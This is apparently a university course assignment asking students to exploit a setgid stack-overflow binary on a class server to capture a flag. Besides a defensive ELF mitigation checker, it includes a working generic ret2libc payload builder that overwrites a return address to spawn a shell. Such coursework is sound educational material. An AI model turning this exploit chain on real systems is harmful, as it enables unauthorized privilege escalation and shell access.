The goals of this assignment are to:
- Analyze the source code of a vulnerable program
- Exploit the program to capture a secret flag
This assignment is hosted on the class challenge server. You will first need to request an account on the server by emailing an SSH public key to the professor. You will then receive information on accessing the server.
The server is provisioned with a basic set of tools, including pwntools and a system-wide pwndbg installation in /opt/pwndbg. To have pwndbg loaded automatically whenever gdb starts, add the line source /opt/pwndbg/gdbinit.py to your $HOME/.gdbinit file. If there are other tools you would like installed system-wide, email the professor.
A variant of the stack overflow program analyzed in class is located in /home/chall01/:
[root@svs ~]# ll /home/chall01/
-rwxr-sr-x. 1 root chall01 29952 Jan 23 18:12 chall01
-rw-r--r--. 1 root root 602 Jan 23 18:12 chall01.cpp
-r--r-----. 1 root chall01 34 Jan 22 21:56 flag
This program has NX enabled, but ASLR is disabled and it has not been compiled with stack protectors. Concretely: the stack is not executable, so shellcode placed in the overflowed buffer cannot be run directly; with ASLR off, the binary and libc load at the same addresses on every run, so those addresses can be read once in the debugger and hard-coded (stack addresses are also fixed, but they shift with the size of the environment and arguments, so they are less reliable targets than libc or binary addresses); with no canary, nothing sits between the buffer and the saved return address, so an overflow overwrites it directly. The s in the group-execute position of chall01 (-rwxr-sr-x) marks it setgid: it runs with effective group chall01, which is the group allowed to read flag (-r--r-----).
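As an added check (not part of the assignment or the course tooling), the script below reads the ELF program headers to confirm the properties stated above for any ELF64 binary: NX from the PT_GNU_STACK flags, position independence from the ELF type, and, as a heuristic, stack protectors from the presence of the __stack_chk_fail symbol name; ASLR is a kernel setting and is read from /proc/sys/kernel/randomize_va_space. The toy ELF image it builds for the stand-alone run is constructed for the demonstration and is not loadable. On the challenge server, run it as python3 checkmitig.py /home/chall01/chall01; pwn checksec from pwntools reports the same properties and is a good cross-check.

```python
"""Mitigation check for an ELF64 binary (added example, not course code)."""
import struct
import sys

PT_GNU_STACK = 0x6474E551  # program header that records the stack's permissions
PF_X = 0x1                 # executable bit in p_flags
ET_EXEC, ET_DYN = 2, 3     # fixed-address executable vs position-independent

def elf64_mitigations(data: bytes) -> dict:
    """Return {'nx': bool, 'pie': bool, 'canary': bool} for an ELF64 image."""
    if data[:4] != b"\x7fELF" or data[4] != 2:
        raise ValueError("expected an ELF64 image")
    e = "<" if data[5] == 1 else ">"            # EI_DATA: 1 = little endian
    e_type, = struct.unpack_from(e + "H", data, 16)
    e_phoff, = struct.unpack_from(e + "Q", data, 32)
    e_phentsize, e_phnum = struct.unpack_from(e + "HH", data, 54)

    stack_flags = None
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from(e + "II", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            stack_flags = p_flags
    # No PT_GNU_STACK header at all: treat the stack as executable (the
    # conservative reading). Otherwise NX holds exactly when PF_X is clear.
    nx = stack_flags is not None and not (stack_flags & PF_X)
    pie = e_type == ET_DYN
    # Heuristic: gcc's -fstack-protector emits calls to __stack_chk_fail, so the
    # name appears in the dynamic symbol table of a protected, dynamically
    # linked binary. A stripped static binary would be a false negative.
    canary = b"__stack_chk_fail" in data
    return {"nx": nx, "pie": pie, "canary": canary}

def aslr_level(text: str) -> str:
    """Interpret the contents of /proc/sys/kernel/randomize_va_space."""
    return {"0": "disabled", "1": "stack and mmap only", "2": "full"}.get(text.strip(), "unknown")

def check_file(path: str) -> dict:
    """Mitigations of the binary at path plus the kernel's ASLR setting."""
    with open(path, "rb") as f:
        result = elf64_mitigations(f.read())
    try:
        with open("/proc/sys/kernel/randomize_va_space") as f:
            result["aslr"] = aslr_level(f.read())
    except OSError:
        result["aslr"] = "unknown"
    return result

def toy_elf64(e_type: int, stack_flags: int, with_canary: bool) -> bytes:
    """Constructed, non-loadable ELF64 image with one PT_GNU_STACK header,
    just enough for elf64_mitigations() to classify it."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8   # ELF64, LE, v1
    ehdr = ident + struct.pack("<HHIQQQIHHHHHH", e_type, 0x3E, 1, 0, 64, 0, 0,
                               64, 56, 1, 64, 0, 0)
    phdr = struct.pack("<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 0x10)
    tail = b"__stack_chk_fail\x00" if with_canary else b""
    return ehdr + phdr + tail

if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(check_file(sys.argv[1]))
    else:
        # Same profile as the assignment describes: NX on, no canary (and here no PIE)
        print(elf64_mitigations(toy_elf64(ET_EXEC, 0x6, False)))
```

The canary test is a heuristic on purpose: the reliable answer is to disassemble a function in pwndbg and look for the fs:0x28 load and compare that the stack protector inserts.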
Use the techniques presented in class to execute a shell with the group privileges of chall01. With that shell, capture the contents of the flag. Confirm with id that the shell's effective group really is chall01: bash resets an effective gid that differs from the real gid unless it is started with -p, so a shell that reports only your own group has dropped the privilege the overflow gained.
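The generic shape of the attack, as an added example rather than the course's reference solution: with NX on, bytes in the buffer cannot be executed, but with ASLR off libc sits at the same address every time, so the saved return address is overwritten with a short chain that calls libc's own system("/bin/sh"). Everything that is specific to chall01 (the offset to the return address, the gadget and libc addresses, and how the program reads its input) is an assumption here, to be replaced with values measured in pwndbg; the numbers in the __main__ block are placeholders, not addresses from the server.

```python
"""Generic x86-64 ret2libc payload builder for an NX, no-ASLR, no-canary target.

Added example, not the course's reference solution. Every address below is a
placeholder: read the real ones from the binary and libc in pwndbg.
"""
import struct
import sys
from typing import List, Optional

def p64(value: int) -> bytes:
    """Little-endian 64-bit pack, the same as pwntools' p64."""
    return struct.pack("<Q", value)

def build_ret2libc_x64(offset: int, pop_rdi_ret: int, binsh: int,
                       system: int, ret_gadget: Optional[int] = None) -> bytes:
    """Filler up to the saved return address, then the call chain.

    offset       distance from the start of the overflowed buffer to the saved
                 return address (measure it with a cyclic pattern in pwndbg)
    pop_rdi_ret  address of a 'pop rdi; ret' gadget: loads the first argument
    binsh        address of a "/bin/sh" string (libc carries one)
    system       address of system() in libc
    ret_gadget   optional lone 'ret' placed first to re-align the stack to
                 16 bytes, which some libc builds require before system()
    """
    chain = b"" if ret_gadget is None else p64(ret_gadget)
    chain += p64(pop_rdi_ret) + p64(binsh) + p64(system)
    return b"A" * offset + chain

def decode_chain(payload: bytes, offset: int) -> List[int]:
    """Read the chain back as a list of addresses, for a sanity check."""
    chain = payload[offset:]
    return [struct.unpack_from("<Q", chain, i)[0] for i in range(0, len(chain) // 8 * 8, 8)]

def bad_byte_positions(payload: bytes, bad: bytes) -> List[int]:
    """Offsets of bytes at which the program's input routine would stop.

    Every x86-64 user-space address has zero high bytes, so the chain always
    contains NULs: harmless if the program reads with read() or fgets(), fatal
    if it copies with strcpy(), which then delivers only the first address and
    only up to its first zero byte.
    """
    return [i for i, b in enumerate(payload) if b in bad]

if __name__ == "__main__":
    # Placeholder values (assumptions, not addresses taken from the challenge server).
    OFFSET = 72
    POP_RDI_RET = 0x0000000000401203
    BINSH = 0x00007ffff7f5e5bd
    SYSTEM = 0x00007ffff7e1a2f0
    RET = 0x000000000040101a
    payload = build_ret2libc_x64(OFFSET, POP_RDI_RET, BINSH, SYSTEM, ret_gadget=RET)
    print("chain:", [hex(a) for a in decode_chain(payload, OFFSET)], file=sys.stderr)
    print("NUL bytes at:", bad_byte_positions(payload, b"\x00"), file=sys.stderr)
    sys.stdout.buffer.write(payload)   # raw bytes on stdout, to be piped to the target
```

How the bytes reach chall01 depends on how its source reads input, which this page does not show; the builder only produces the payload, and whether a pipe, a file argument or a pwntools process() is the right delivery is part of analyzing chall01.cpp. A process started from a shell that has the payload on a pipe will exit as soon as stdin closes, so when the shell does spawn, keep stdin open (for example with cat appended to the pipe) or use pwntools' interactive().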
Package your solution as a gzipped TAR archive. Include the source code for your attack as well as a README describing your solution, how to run it, and the contents of the flag.